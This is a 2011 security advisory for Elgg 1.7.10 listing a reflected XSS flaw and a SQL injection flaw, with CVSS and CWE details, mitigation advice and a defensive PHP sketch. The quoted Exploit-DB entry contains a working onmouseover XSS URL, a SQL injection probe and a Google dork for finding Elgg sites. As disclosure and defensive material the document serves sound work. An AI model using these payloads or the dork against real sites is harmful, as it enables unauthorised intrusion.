Vendor: Elgg
By: Aung Khant
CVSS: 7.5 (HIGH)
Vulnerability type: XSS, SQL Injection
CWE: 79 (XSS), 89 (SQL Injection)
Product Name: Elgg
Affected Version From: 1.7.10
Affected Version To: 1.7.10
Patch Exists: YES
CPE: elgg:elgg
Year: 2011

Exploit Title: Elgg 1.7.10 <= Multiple Vulnerabilities

XSS: A malicious user can inject a script into the internalname parameter of the embed/media page. The script executes when the mouse pointer is moved over the page.

SQL Injection: A malicious user can inject a SQL query into the tag_names parameter of the search page.

Mitigation:

Input validation should be used to prevent XSS and SQL Injection attacks. Sanitize user input and escape special characters.
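
The mitigation above, sketched in PHP (the language Elgg is written in) as an added example; it is not Elgg code and not part of the original advisory. It assumes internalname is an identifier reflected into a quoted HTML attribute and that tag_names selects a tag field in a search query; the function names, the tag_index table and its columns, and the allow-list are hypothetical.

```php
<?php
// Added illustration, not Elgg source. Function, table and column names are hypothetical.

// Input validation: treat internalname as an identifier and reject anything else.
function valid_internalname(string $v): bool
{
    return preg_match('/^[A-Za-z0-9_-]{1,64}$/D', $v) === 1;
}

// Output encoding for a quoted HTML attribute: ENT_QUOTES encodes both " and ',
// so the value cannot close the attribute and introduce a new one (e.g. an event handler).
function attr(string $v): string
{
    return htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// tag_names is checked against an allow-list, then bound as a parameter;
// it is never concatenated into the SQL text.
function search_by_tag(PDO $db, string $tagName, string $q): array
{
    $allowed = ['tags', 'location', 'interests'];   // constructed allow-list
    if (!in_array($tagName, $allowed, true)) {
        return [];
    }
    $stmt = $db->prepare(
        'SELECT entity_id FROM tag_index WHERE tag_name = :name AND tag_value LIKE :value'
    );
    $stmt->execute([':name' => $tagName, ':value' => '%' . $q . '%']);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed demo data in an in-memory SQLite database (needs the pdo_sqlite extension).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE tag_index (entity_id INTEGER, tag_name TEXT, tag_value TEXT)');
$db->exec("INSERT INTO tag_index VALUES (1, 'location', 'SQLin City')");

// Decoded internalname value from the advisory's XSS URL (style value shortened),
// followed by a benign value.
foreach ([' "onmouseover="alert(/XSS/)"style="width:3000px!important;" x="', 'description'] as $v) {
    printf("valid=%s value=\"%s\"\n", var_export(valid_internalname($v), true), attr($v));
}
// tag_names value from the advisory's SQL injection URL, followed by a benign value.
foreach (["location'", 'location'] as $tag) {
    printf("%s => %d row(s)\n", $tag, count(search_by_tag($db, $tag, 'SQLin')));
}
```

Validation and encoding are kept as separate functions because they apply at different points: validation when the parameter is read, encoding when the value is written into markup.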

Exploit-DB raw data:

# Exploit Title: Elgg 1.7.10 <= Multiple Vulnerabilities
# Google Dork: intext:"Powered by Elgg, the leading open source social networking platform"
# Date: 2011-08-18
# Author: Aung Khant <YGN Ethical Hacker Group - http://yehg.net/>
# Software Link: http://elgg.org/getelgg.php?forward=elgg-1.7.10.zip
# Version: 1.7.10 <=


1.  XSS

http://localhost/pg/embed/media?internalname=%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22



2. SQL Injection

http://localhost/pg/search/?q=SQLin&search_type=tags&tag_names=location'